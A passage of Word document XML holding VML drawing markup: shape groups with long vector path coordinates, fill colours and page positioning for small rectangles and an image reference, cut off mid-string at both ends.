13208,1510,13205,1510,13203,1510,13200,1510,13197,1510,13194,1510,13191,1510,13188,1510,13185,1510,13181,1510,13178,1510,13174,1510,13171,1510,13167,1510,13163,1510,13159,1510,13155,1510,13151,1510,13147,1510,13142,1510,13138,1510,13133,1510,13128,1510,13123,1510,13118,1510,13113,1510,13108,1510,13103,1510,13097,1510,13092,1510,13086,1510,13080,1510,13074,1510,13068,1510,13062,1510,13056,1510,13049,1510,13043,1510,13036,1510,13029,1510,13022,1510,13015,1510,13008,1510,13000,1510,12993,1510,12985,1510,12977,1510,12969,1510,12961,1510,12952,1510,12944,1510,12935,1510,12927,1510,12918,1510,12909,1510,12899,1510,12890,1510,12880,1510,12870e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:642.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:126.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,2530" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:2530;width:130;height:270" coordorigin="3850,2530" coordsize="130,270" path="m3866,2545l3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3866,2545,3867,2545,3867,2545,3867,2545,3867,2545,3867,2545,3867,2545,3867,2545,3867,2545,3868,2545,3868,2545,3868,2545,3868,2545,3868,2545,3869,2545,3869,2545,3869,2545,3869,2545,3870,2545,3870,2545,3870,2545,3871,2545,3871,2545,3871,2545,3872,2545,3872,2545,3872,2545,3873,2545,3873,2545,3874,2545,3874,2545,3875,2545,3875,2545,3876,2545,3877,2545,3877,2545,3878,2545,3878,2545,3879,2545,3880,2545,3881,2545,3881,2545,3882,2545,3883,2545,3884,2545,3885,2545,3886,2545,3886,2545,3887,2545,3888,2545,3889,2545,3890,2545,3891,2545,3893,2545,3894,2545,3895,2545,3896,2545,3897,2545,3898,2545,3900,2545,3901,2545,3902,2545,3904,2545,3905,2545,3907,2545,3908,2545,3910,2545,3911,2545,3913,2545,3914,2545,3916,2545,3918,2545,3920,2545,3921,2545,3923,2545,3925,2545,3927,2545,3929,2545,3931,2545,3933,2545,3935,2545,3937,2545,3939,2545,3942,2545,3944,2545,3946,2545,3948,2545,3951,2545,3953,2545,3956,2545,3958,2545,3961,2545,3963,2545,3966,2545,3969,2545,3972,2545,3974,2545,3977,2545,3980,2545,3983,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2545,3986,2546,3986,2546,3986,2546,3986,2546,3986,2546,3986,2546,3986,2546,3986,2546,3986,2546,3986,2547,3986,2547,3986,2547,3986,2547,3986,2548,3986,2548,3986,2548,3986,2549,3986,2549,3986,2549,3986,2550,3986,2550,3986,2551,3986,2551,3986,2552,3986,2552,3986,2553,3986,2554,3986,2554,3986,2555,3986,2556,3986,2556,3986,2557,3986,2558,3986,2559,3986,2560,3986,2561,3986,2562,3986,2563,3986,2564,3986,2565,3986,2567,3986,2568,3986,2569,3986,2570,3986,2572,3986,2573,3986,2575,3986,2576,3986,2578,3986,2580,3986,2581,3986,2583,3986,2585,3986,2587,3986,2589,3986,2591,3986,2593,3986,2595,3986,2597,3986,2599,3986,2602,3986,2604,3986,2607,3986,2609,3986,2612,3986,2614,3986,2617,3986,2620,3986,2623,3986,2626,3986,2629,3986,2632,3986,2635,3986,2638,3986,2642,3986,2645,3986,2648,3986,2652,3986,2656,3986,2659,3986,2663,3986,2667,3986,2671,3986,2675,3986,2679,3986,2683,3986,2688,3986,2692,3986,2697,3986,2701,3986,2706,3986,2711,3986,2716,3986,2721,3986,2726,3986,2731,3986,2736,3986,2741,3986,2747,3986,2752,3986,2758,3986,2764,3986,2770,3986,2776,3986,2782,3986,2788,3986,2794,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3986,2800,3985,2800,3985,2800,3985,2800,3985,2800,3985,2800,3985,2800,3985,2800,3985,2800,3984,2800,3984,2800,3984,2800,3984,2800,3984,2800,3983,2800,3983,2800,3983,2800,3983,2800,3982,2800,3982,2800,3982,2800,3981,2800,3981,2800,3981,2800,3980,2800,3980,2800,3980,2800,3979,2800,3979,2800,3978,2800,3978,2800,3977,2800,3977,2800,3976,2800,3975,2800,3975,2800,3974,2800,3973,2800,3973,2800,3972,2800,3971,2800,3971,2800,3970,2800,3969,2800,3968,2800,3967,2800,3966,2800,3966,2800,3965,2800,3964,2800,3963,2800,3962,2800,3961,2800,3959,2800,3958,2800,3957,2800,3956,2800,3955,2800,3953,2800,3952,2800,3951,2800,3950,2800,3948,2800,3947,2800,3945,2800,3944,2800,3942,2800,3941,2800,3939,2800,3937,2800,3936,2800,3934,2800,3932,2800,3931,2800,3929,2800,3927,2800,3925,2800,3923,2800,3921,2800,3919,2800,3917,2800,3915,2800,3913,2800,3910,2800,3908,2800,3906,2800,3904,2800,3901,2800,3899,2800,3896,2800,3894,2800,3891,2800,3889,2800,3886,2800,3883,2800,3880,2800,3878,2800,3875,2800,3872,2800,3869,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2799,3866,2799,3866,2799,3866,2799,3866,2799,3866,2798,3866,2798,3866,2798,3866,2797,3866,2797,3866,2797,3866,2796,3866,2796,3866,2795,3866,2795,3866,2794,3866,2794,3866,2793,3866,2793,3866,2792,3866,2791,3866,2791,3866,2790,3866,2789,3866,2788,3866,2788,3866,2787,3866,2786,3866,2785,3866,2784,3866,2783,3866,2781,3866,2780,3866,2779,3866,2778,3866,2777,3866,2775,3866,2774,3866,2772,3866,2771,3866,2769,3866,2768,3866,2766,3866,2764,3866,2763,3866,2761,3866,2759,3866,2757,3866,2755,3866,2753,3866,2751,3866,2748,3866,2746,3866,2744,3866,2742,3866,2739,3866,2737,3866,2734,3866,2731,3866,2729,3866,2726,3866,2723,3866,2720,3866,2717,3866,2714,3866,2711,3866,2707,3866,2704,3866,2701,3866,2697,3866,2694,3866,2690,3866,2686,3866,2683,3866,2679,3866,2675,3866,2671,3866,2666,3866,2662,3866,2658,3866,2654,3866,2649,3866,2644,3866,2640,3866,2635,3866,2630,3866,2625,3866,2620,3866,2615,3866,2610,3866,2604,3866,2599,3866,2593,3866,2588,3866,2582,3866,2576,3866,2570,3866,2564,3866,2558,3866,2552,3866,2545e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:145.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,2910" coordsize="130,250">
        <v:shape style="position:absolute;left:3010;top:2910;width:130;height:250" coordorigin="3010,2910" coordsize="130,250" path="m3026,2920l3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3028,2920,3028,2920,3028,2920,3028,2920,3029,2920,3029,2920,3029,2920,3029,2920,3030,2920,3030,2920,3030,2920,3031,2920,3031,2920,3032,2920,3032,2920,3032,2920,3033,2920,3033,2920,3034,2920,3034,2920,3035,2920,3036,2920,3036,2920,3037,2920,3037,2920,3038,2920,3039,2920,3039,2920,3040,2920,3041,2920,3042,2920,3043,2920,3043,2920,3044,2920,3045,2920,3046,2920,3047,2920,3048,2920,3049,2920,3050,2920,3051,2920,3052,2920,3053,2920,3054,2920,3056,2920,3057,2920,3058,2920,3059,2920,3061,2920,3062,2920,3063,2920,3065,2920,3066,2920,3068,2920,3069,2920,3071,2920,3072,2920,3074,2920,3076,2920,3077,2920,3079,2920,3081,2920,3083,2920,3085,2920,3087,2920,3089,2920,3091,2920,3093,2920,3095,2920,3097,2920,3099,2920,3101,2920,3103,2920,3106,2920,3108,2920,3110,2920,3113,2920,3115,2920,3118,2920,3120,2920,3123,2920,3126,2920,3128,2920,3131,2920,3134,2920,3137,2920,3140,2920,3143,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2922,3146,2922,3146,2922,3146,2922,3146,2922,3146,2923,3146,2923,3146,2923,3146,2923,3146,2924,3146,2924,3146,2925,3146,2925,3146,2925,3146,2926,3146,2926,3146,2927,3146,2928,3146,2928,3146,2929,3146,2929,3146,2930,3146,2931,3146,2932,3146,2933,3146,2933,3146,2934,3146,2935,3146,2936,3146,2937,3146,2938,3146,2939,3146,2941,3146,2942,3146,2943,3146,2944,3146,2946,3146,2947,3146,2949,3146,2950,3146,2952,3146,2953,3146,2955,3146,2957,3146,2958,3146,2960,3146,2962,3146,2964,3146,2966,3146,2968,3146,2970,3146,2972,3146,2975,3146,2977,3146,2979,3146,2982,3146,2984,3146,2987,3146,2990,3146,2992,3146,2995,3146,2998,3146,3001,3146,3004,3146,3007,3146,3010,3146,3013,3146,3017,3146,3020,3146,3024,3146,3027,3146,3031,3146,3035,3146,3038,3146,3042,3146,3046,3146,3050,3146,3054,3146,3059,3146,3063,3146,3067,3146,3072,3146,3076,3146,3081,3146,3086,3146,3091,3146,3096,3146,3101,3146,3106,3146,3111,3146,3117,3146,3122,3146,3128,3146,3133,3146,3139,3146,3145,3146,3151,3146,3157,3146,3163,3146,3169,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3144,3176,3144,3176,3144,3176,3144,3176,3144,3176,3144,3176,3143,3176,3143,3176,3143,3176,3143,3176,3143,3176,3142,3176,3142,3176,3142,3176,3141,3176,3141,3176,3141,3176,3140,3176,3140,3176,3140,3176,3139,3176,3139,3176,3138,3176,3138,3176,3137,3176,3137,3176,3136,3176,3136,3176,3135,3176,3134,3176,3134,3176,3133,3176,3132,3176,3132,3176,3131,3176,3130,3176,3129,3176,3129,3176,3128,3176,3127,3176,3126,3176,3125,3176,3124,3176,3123,3176,3122,3176,3121,3176,3120,3176,3119,3176,3118,3176,3117,3176,3116,3176,3114,3176,3113,3176,3112,3176,3110,3176,3109,3176,3108,3176,3106,3176,3105,3176,3103,3176,3102,3176,3100,3176,3099,3176,3097,3176,3095,3176,3094,3176,3092,3176,3090,3176,3088,3176,3086,3176,3084,3176,3083,3176,3081,3176,3079,3176,3076,3176,3074,3176,3072,3176,3070,3176,3068,3176,3065,3176,3063,3176,3061,3176,3058,3176,3056,3176,3053,3176,3051,3176,3048,3176,3045,3176,3043,3176,3040,3176,3037,3176,3034,3176,3031,3176,3029,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3174,3026,3174,3026,3174,3026,3174,3026,3173,3026,3173,3026,3173,3026,3173,3026,3172,3026,3172,3026,3172,3026,3171,3026,3171,3026,3170,3026,3170,3026,3169,3026,3169,3026,3168,3026,3167,3026,3167,3026,3166,3026,3165,3026,3164,3026,3164,3026,3163,3026,3162,3026,3161,3026,3160,3026,3159,3026,3158,3026,3157,3026,3156,3026,3154,3026,3153,3026,3152,3026,3150,3026,3149,3026,3148,3026,3146,3026,3144,3026,3143,3026,3141,3026,3140,3026,3138,3026,3136,3026,3134,3026,3132,3026,3130,3026,3128,3026,3126,3026,3124,3026,3121,3026,3119,3026,3117,3026,3114,3026,3112,3026,3109,3026,3106,3026,3104,3026,3101,3026,3098,3026,3095,3026,3092,3026,3089,3026,3086,3026,3083,3026,3079,3026,3076,3026,3072,3026,3069,3026,3065,3026,3062,3026,3058,3026,3054,3026,3050,3026,3046,3026,3042,3026,3037,3026,3033,3026,3029,3026,3024,3026,3020,3026,3015,3026,3010,3026,3005,3026,3000,3026,2995,3026,2990,3026,2985,3026,2980,3026,2974,3026,2969,3026,2963,3026,2957,3026,2951,3026,2945,3026,2939,3026,2933,3026,2927,3026,2920e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:199.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,3990" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:3990;width:130;height:270" coordorigin="3490,3990" coordsize="130,270" path="m3506,4016l3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3508,4016,3508,4016,3508,4016,3508,4016,3508,4016,3509,4016,3509,4016,3509,4016,3509,4016,3510,4016,3510,4016,3510,4016,3511,4016,3511,4016,3511,4016,3512,4016,3512,4016,3513,4016,3513,4016,3514,4016,3514,4016,3515,4016,3515,4016,3516,4016,3516,4016,3517,4016,3518,4016,3518,4016,3519,4016,3520,4016,3520,4016,3521,4016,3522,4016,3523,4016,3524,4016,3524,4016,3525,4016,3526,4016,3527,4016,3528,4016,3529,4016,3530,4016,3531,4016,3532,4016,3533,4016,3535,4016,3536,4016,3537,4016,3538,4016,3540,4016,3541,4016,3542,4016,3544,4016,3545,4016,3547,4016,3548,4016,3550,4016,3551,4016,3553,4016,3554,4016,3556,4016,3558,4016,3559,4016,3561,4016,3563,4016,3565,4016,3567,4016,3569,4016,3571,4016,3573,4016,3575,4016,3577,4016,3579,4016,3581,4016,3584,4016,3586,4016,3588,4016,3591,4016,3593,4016,3596,4016,3598,4016,3601,4016,3603,4016,3606,4016,3609,4016,3611,4016,3614,4016,3617,4016,3620,4016,3623,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4018,3626,4018,3626,4018,3626,4018,3626,4019,3626,4019,3626,4019,3626,4020,3626,4020,3626,4021,3626,4021,3626,4021,3626,4022,3626,4023,3626,4023,3626,4024,3626,4024,3626,4025,3626,4026,3626,4026,3626,4027,3626,4028,3626,4029,3626,4030,3626,4031,3626,4032,3626,4033,3626,4034,3626,4035,3626,4036,3626,4037,3626,4039,3626,4040,3626,4041,3626,4043,3626,4044,3626,4046,3626,4047,3626,4049,3626,4050,3626,4052,3626,4054,3626,4056,3626,4058,3626,4060,3626,4062,3626,4064,3626,4066,3626,4068,3626,4070,3626,4073,3626,4075,3626,4077,3626,4080,3626,4082,3626,4085,3626,4088,3626,4091,3626,4094,3626,4096,3626,4099,3626,4103,3626,4106,3626,4109,3626,4112,3626,4116,3626,4119,3626,4123,3626,4126,3626,4130,3626,4134,3626,4138,3626,4142,3626,4146,3626,4150,3626,4154,3626,4159,3626,4163,3626,4167,3626,4172,3626,4177,3626,4181,3626,4186,3626,4191,3626,4196,3626,4201,3626,4207,3626,4212,3626,4218,3626,4223,3626,4229,3626,4234,3626,4240,3626,4246,3626,4252,3626,4258,3626,4265,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3624,4271,3624,4271,3624,4271,3624,4271,3624,4271,3623,4271,3623,4271,3623,4271,3623,4271,3623,4271,3622,4271,3622,4271,3622,4271,3621,4271,3621,4271,3621,4271,3620,4271,3620,4271,3619,4271,3619,4271,3618,4271,3618,4271,3617,4271,3617,4271,3616,4271,3616,4271,3615,4271,3615,4271,3614,4271,3613,4271,3613,4271,3612,4271,3611,4271,3610,4271,3610,4271,3609,4271,3608,4271,3607,4271,3606,4271,3605,4271,3604,4271,3603,4271,3602,4271,3601,4271,3600,4271,3599,4271,3598,4271,3597,4271,3596,4271,3595,4271,3593,4271,3592,4271,3591,4271,3589,4271,3588,4271,3587,4271,3585,4271,3584,4271,3582,4271,3581,4271,3579,4271,3577,4271,3576,4271,3574,4271,3572,4271,3570,4271,3569,4271,3567,4271,3565,4271,3563,4271,3561,4271,3559,4271,3557,4271,3555,4271,3552,4271,3550,4271,3548,4271,3546,4271,3543,4271,3541,4271,3539,4271,3536,4271,3534,4271,3531,4271,3528,4271,3526,4271,3523,4271,3520,4271,3517,4271,3515,4271,3512,4271,3509,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4270,3506,4270,3506,4270,3506,4270,3506,4270,3506,4270,3506,4269,3506,4269,3506,4269,3506,4268,3506,4268,3506,4268,3506,4267,3506,4267,3506,4267,3506,4266,3506,4266,3506,4265,3506,4265,3506,4264,3506,4263,3506,4263,3506,4262,3506,4261,3506,4261,3506,4260,3506,4259,3506,4258,3506,4257,3506,4256,3506,4255,3506,4254,3506,4253,3506,4252,3506,4251,3506,4250,3506,4249,3506,4247,3506,4246,3506,4245,3506,4243,3506,4242,3506,4240,3506,4238,3506,4237,3506,4235,3506,4233,3506,4231,3506,4230,3506,4228,3506,4226,3506,4224,3506,4221,3506,4219,3506,4217,3506,4215,3506,4212,3506,4210,3506,4207,3506,4205,3506,4202,3506,4199,3506,4196,3506,4194,3506,4191,3506,4188,3506,4185,3506,4181,3506,4178,3506,4175,3506,4171,3506,4168,3506,4164,3506,4161,3506,4157,3506,4153,3506,4149,3506,4145,3506,4141,3506,4137,3506,4133,3506,4129,3506,4124,3506,4120,3506,4115,3506,4110,3506,4106,3506,4101,3506,4096,3506,4091,3506,4086,3506,4080,3506,4075,3506,4070,3506,4064,3506,4058,3506,4053,3506,4047,3506,4041,3506,4035,3506,4029,3506,4022,3506,4016e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:310.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,6210" coordsize="130,250">
        <v:shape style="position:absolute;left:2170;top:6210;width:130;height:250" coordorigin="2170,6210" coordsize="130,250" path="m2185,6222l2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2187,6222,2187,6222,2187,6222,2187,6222,2187,6222,2187,6222,2188,6222,2188,6222,2188,6222,2188,6222,2189,6222,2189,6222,2189,6222,2190,6222,2190,6222,2190,6222,2191,6222,2191,6222,2192,6222,2192,6222,2192,6222,2193,6222,2193,6222,2194,6222,2195,6222,2195,6222,2196,6222,2196,6222,2197,6222,2198,6222,2198,6222,2199,6222,2200,6222,2200,6222,2201,6222,2202,6222,2203,6222,2204,6222,2205,6222,2206,6222,2207,6222,2208,6222,2209,6222,2210,6222,2211,6222,2212,6222,2213,6222,2214,6222,2215,6222,2216,6222,2218,6222,2219,6222,2220,6222,2222,6222,2223,6222,2224,6222,2226,6222,2227,6222,2229,6222,2230,6222,2232,6222,2234,6222,2235,6222,2237,6222,2239,6222,2241,6222,2242,6222,2244,6222,2246,6222,2248,6222,2250,6222,2252,6222,2254,6222,2256,6222,2259,6222,2261,6222,2263,6222,2265,6222,2268,6222,2270,6222,2272,6222,2275,6222,2277,6222,2280,6222,2283,6222,2285,6222,2288,6222,2291,6222,2293,6222,2296,6222,2299,6222,2302,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6224,2305,6224,2305,6224,2305,6224,2305,6224,2305,6225,2305,6225,2305,6225,2305,6226,2305,6226,2305,6227,2305,6227,2305,6228,2305,6228,2305,6229,2305,6229,2305,6230,2305,6230,2305,6231,2305,6232,2305,6233,2305,6233,2305,6234,2305,6235,2305,6236,2305,6237,2305,6238,2305,6239,2305,6240,2305,6241,2305,6242,2305,6243,2305,6245,2305,6246,2305,6247,2305,6249,2305,6250,2305,6252,2305,6253,2305,6255,2305,6256,2305,6258,2305,6260,2305,6262,2305,6264,2305,6266,2305,6268,2305,6270,2305,6272,2305,6274,2305,6276,2305,6279,2305,6281,2305,6283,2305,6286,2305,6289,2305,6291,2305,6294,2305,6297,2305,6300,2305,6303,2305,6306,2305,6309,2305,6312,2305,6315,2305,6318,2305,6322,2305,6325,2305,6329,2305,6332,2305,6336,2305,6340,2305,6344,2305,6348,2305,6352,2305,6356,2305,6360,2305,6365,2305,6369,2305,6374,2305,6378,2305,6383,2305,6388,2305,6392,2305,6397,2305,6402,2305,6408,2305,6413,2305,6418,2305,6424,2305,6429,2305,6435,2305,6441,2305,6446,2305,6452,2305,6458,2305,6465,2305,6471,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2303,6477,2303,6477,2303,6477,2303,6477,2303,6477,2302,6477,2302,6477,2302,6477,2302,6477,2301,6477,2301,6477,2301,6477,2300,6477,2300,6477,2299,6477,2299,6477,2299,6477,2298,6477,2298,6477,2297,6477,2297,6477,2296,6477,2296,6477,2295,6477,2295,6477,2294,6477,2293,6477,2293,6477,2292,6477,2291,6477,2291,6477,2290,6477,2289,6477,2288,6477,2287,6477,2286,6477,2286,6477,2285,6477,2284,6477,2283,6477,2282,6477,2281,6477,2280,6477,2279,6477,2277,6477,2276,6477,2275,6477,2274,6477,2273,6477,2271,6477,2270,6477,2269,6477,2267,6477,2266,6477,2264,6477,2263,6477,2261,6477,2260,6477,2258,6477,2257,6477,2255,6477,2253,6477,2251,6477,2250,6477,2248,6477,2246,6477,2244,6477,2242,6477,2240,6477,2238,6477,2236,6477,2234,6477,2232,6477,2230,6477,2227,6477,2225,6477,2223,6477,2220,6477,2218,6477,2215,6477,2213,6477,2210,6477,2208,6477,2205,6477,2202,6477,2200,6477,2197,6477,2194,6477,2191,6477,2188,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6476,2185,6476,2185,6476,2185,6476,2185,6476,2185,6475,2185,6475,2185,6475,2185,6475,2185,6474,2185,6474,2185,6474,2185,6473,2185,6473,2185,6472,2185,6472,2185,6471,2185,6471,2185,6470,2185,6470,2185,6469,2185,6468,2185,6468,2185,6467,2185,6466,2185,6465,2185,6464,2185,6463,2185,6463,2185,6462,2185,6461,2185,6459,2185,6458,2185,6457,2185,6456,2185,6455,2185,6453,2185,6452,2185,6451,2185,6449,2185,6448,2185,6446,2185,6445,2185,6443,2185,6441,2185,6439,2185,6438,2185,6436,2185,6434,2185,6432,2185,6430,2185,6428,2185,6425,2185,6423,2185,6421,2185,6418,2185,6416,2185,6413,2185,6411,2185,6408,2185,6405,2185,6403,2185,6400,2185,6397,2185,6394,2185,6391,2185,6388,2185,6384,2185,6381,2185,6378,2185,6374,2185,6371,2185,6367,2185,6363,2185,6359,2185,6355,2185,6352,2185,6347,2185,6343,2185,6339,2185,6335,2185,6330,2185,6326,2185,6321,2185,6317,2185,6312,2185,6307,2185,6302,2185,6297,2185,6292,2185,6287,2185,6281,2185,6276,2185,6270,2185,6265,2185,6259,2185,6253,2185,6247,2185,6241,2185,6235,2185,6229,2185,6222e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:470.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,9410" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:9410;width:130;height:270" coordorigin="6730,9410" coordsize="130,270" path="m6747,9434l6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6749,9434,6749,9434,6749,9434,6749,9434,6749,9434,6749,9434,6750,9434,6750,9434,6750,9434,6750,9434,6750,9434,6751,9434,6751,9434,6751,9434,6752,9434,6752,9434,6752,9434,6753,9434,6753,9434,6753,9434,6754,9434,6754,9434,6755,9434,6755,9434,6756,9434,6756,9434,6757,9434,6757,9434,6758,9434,6759,9434,6759,9434,6760,9434,6761,9434,6761,9434,6762,9434,6763,9434,6764,9434,6764,9434,6765,9434,6766,9434,6767,9434,6768,9434,6769,9434,6770,9434,6771,9434,6772,9434,6773,9434,6774,9434,6775,9434,6776,9434,6777,9434,6779,9434,6780,9434,6781,9434,6783,9434,6784,9434,6785,9434,6787,9434,6788,9434,6790,9434,6791,9434,6793,9434,6794,9434,6796,9434,6798,9434,6799,9434,6801,9434,6803,9434,6805,9434,6807,9434,6808,9434,6810,9434,6812,9434,6814,9434,6817,9434,6819,9434,6821,9434,6823,9434,6825,9434,6828,9434,6830,9434,6832,9434,6835,9434,6837,9434,6840,9434,6842,9434,6845,9434,6847,9434,6850,9434,6853,9434,6856,9434,6859,9434,6862,9434,6864,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9435,6867,9435,6867,9435,6867,9435,6867,9435,6867,9436,6867,9436,6867,9436,6867,9436,6867,9437,6867,9437,6867,9437,6867,9438,6867,9438,6867,9439,6867,9439,6867,9440,6867,9440,6867,9441,6867,9441,6867,9442,6867,9443,6867,9443,6867,9444,6867,9445,6867,9446,6867,9447,6867,9448,6867,9448,6867,9449,6867,9450,6867,9452,6867,9453,6867,9454,6867,9455,6867,9456,6867,9458,6867,9459,6867,9460,6867,9462,6867,9463,6867,9465,6867,9466,6867,9468,6867,9470,6867,9472,6867,9473,6867,9475,6867,9477,6867,9479,6867,9481,6867,9483,6867,9486,6867,9488,6867,9490,6867,9493,6867,9495,6867,9498,6867,9500,6867,9503,6867,9506,6867,9508,6867,9511,6867,9514,6867,9517,6867,9520,6867,9523,6867,9527,6867,9530,6867,9533,6867,9537,6867,9540,6867,9544,6867,9548,6867,9552,6867,9556,6867,9559,6867,9564,6867,9568,6867,9572,6867,9576,6867,9581,6867,9585,6867,9590,6867,9594,6867,9599,6867,9604,6867,9609,6867,9614,6867,9619,6867,9624,6867,9630,6867,9635,6867,9641,6867,9646,6867,9652,6867,9658,6867,9664,6867,9670,6867,9676,6867,9682,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6865,9689,6865,9689,6865,9689,6865,9689,6864,9689,6864,9689,6864,9689,6864,9689,6863,9689,6863,9689,6863,9689,6862,9689,6862,9689,6861,9689,6861,9689,6861,9689,6860,9689,6860,9689,6859,9689,6859,9689,6858,9689,6857,9689,6857,9689,6856,9689,6856,9689,6855,9689,6854,9689,6